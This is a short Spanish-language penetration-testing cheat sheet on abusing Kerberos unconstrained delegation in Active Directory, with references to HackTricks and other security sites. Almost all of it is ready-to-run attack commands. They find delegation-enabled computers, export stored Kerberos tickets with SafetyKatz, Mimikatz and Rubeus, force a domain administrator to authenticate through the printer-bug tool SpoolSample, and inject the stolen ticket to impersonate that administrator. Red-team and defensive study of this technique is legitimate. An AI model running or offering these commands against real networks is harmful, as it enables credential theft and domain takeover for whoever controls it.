Unconstrained Delegation

# Powervierw
Get-DomainComputer -UnConstrained | select samaccountname # $SamAccountName

# Modulo AD
Import-Module ActiveDirecroty
Get-ADComputer -Filter {TrustedForDelegation -eq $true -and primarygroupid -eq 515} -Properties trustedfordelegation,serviceprincipalname,description
Get-ADUser -Filter {TrustedForDelegation -eq $True}

# Exportar TGS almacenados con mimikatz
SafetyKatz.exe '"sekurlsa::tickets /export"' # hash.kirbi
Invoke-Mimikatz –Command '"sekurlsa::tickets /export"' # hash.kirbi

# Exportar TGS almacenados con Rubeus
.\Rubeus.exe monitor /interval:5 /nowrap /targetuser:Administrator # hash.raw convertir a hash.kirbi
	
# Forzando la autenticacion del administrador de dominio
Enter-PSSession {$SamAccountName}

# Forzando la autenticacion del administrador de dominio por error de impresora
.\SpoolSample.exe <printmachine> <unconstrinedmachine>

# Convertir hash.raw a hash.kirbi
[IO.File]::WriteAllBytes("C:\path\hash.kirbi", [Convert]::FromBase64String("hash.raw"))

# exploit
SafetyKatz.exe '"kerberos::ptt C:\path\hash.kirbi"'

Referencias

Unconstrained DelegationPenetration Testing Lab

Unconstrained Delegation - HackTricksbook.hacktricks.xyz

Kerberos (III): ¿Cómo funciona la delegación?Tarlogic Security

PreviousPass the Hash NextConstrained Delegation

Last updated 7 months ago